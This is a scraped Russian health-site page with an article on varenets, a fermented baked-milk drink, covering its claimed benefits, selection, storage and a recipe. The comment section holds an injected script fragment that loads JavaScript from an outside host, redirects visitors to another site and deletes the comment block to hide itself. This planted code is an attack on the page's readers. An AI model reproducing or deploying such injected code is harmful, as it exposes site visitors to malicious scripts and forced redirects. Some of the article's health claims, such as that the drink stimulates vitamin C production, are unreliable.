Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Варенец. Ближайший родств...  >>  Варенец. Ближайший родственник ряженки
 
Обратная связь
 

Варенец. Ближайший родственник ряженки

Размер шрифта
18 ноября 2011 07:21
  • google_analytics: false
  • Нравится

Основа у всех молочных продуктов одна: молоко, но свойства у всех этих продуктов разные. Сегодня на нашей кухне – варенец.

Варенец

Варенец – кисломолочный напиток из топленого коровьего молока на молочнокислом и спиртовом брожении. В этом продукте сохранены все полезные свойства молока, но в отличие от остальных он лучше усваивается, нормализует микрофлору кишечника и стимулирует выработку витамина С.

Чем полезен варенец?

В варенце есть кальций и витамин D. Люди старше 35 лет ежегодно теряют 1% кальция костной ткани. Если выпивать 1 стакан варенца каждый вечер, можно укрепить костную ткань.

Варенец активизирует выделение ферментов в пищеварительном тракте. Улучшается переваривание пищи.

Молочная кислота помогает работе почек, желудка и кишечного тракта, кроме того, усиливает аппетит.

Белок в варенце способствует укреплению мышечной ткани, в том числе и сердечной.

Пьедестал почета по содержанию белка

Пьедестал

1. Варенец – 2,9 гр.
2. Ряженка - 2,8 гр.
3. Простокваша – 2,7 гр.


Как выбрать

  • Варенец готовится из топленого молока, поэтому допустим желтоватый или кремовый оттенок продукта. Варенец не должен быть светло-белого цвета.
  • На упаковке обязательно должно быть указано правильное наименование продукта – «Варенец», пищевая и энергетическая ценность.
  • Обязательно читайте состав на упаковке. Там должны быть указаны только молоко и закваска, и никаких консервантов и красителей.
  • Варенец должен быть «живым», то есть содержание молочнокислых бактерий на конец срока действия должно быть не меньше, чем 1 на 10 в 7 степени.
  • Срок годности варенца не превышает 14 суток.

Открыв дома упаковку с варенцом убедитесь, что в нем нет пузырьков и сгустков – это верный признак посторонней микрофлоры. Такой продукт нельзя употреблять в пищу.

Как хранить

Варенец надо хранить в стекле. Лучше покупать варенец домашнего приготовления.

  • Срок хранения варенца, даже в новейшей упаковке не больше 14 суток. Без консервантов молочную кислую микрофлору больше 14 дней сохранить невозможно: нарастает кислотность, и продукт становится более кислым и жидким.
  • Хранить варенец надо только в холодильнике.
  • Нельзя хранить варенец в металле, только в стекле.

Как приготовить

Ряженку, как и варенец, употребляют аналогично кефиру – небольшими глотками, согрев напиток до комнатной температуры. Домашняя ряженка или варенец из цельного деревенского молока могут быть намного гуще магазинных, и такой продукт следует есть ложкой.

Домашний варенец со сливками

3 ст. ложки творога
150 гр. варенца
1 ложка меда
Сухофрукты
Взбить все в блендере. При подаче добавить изюм или любые сухофрукты.

Видеосюжеты по теме: 

Варенец. Ближайший родственник ряженки

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.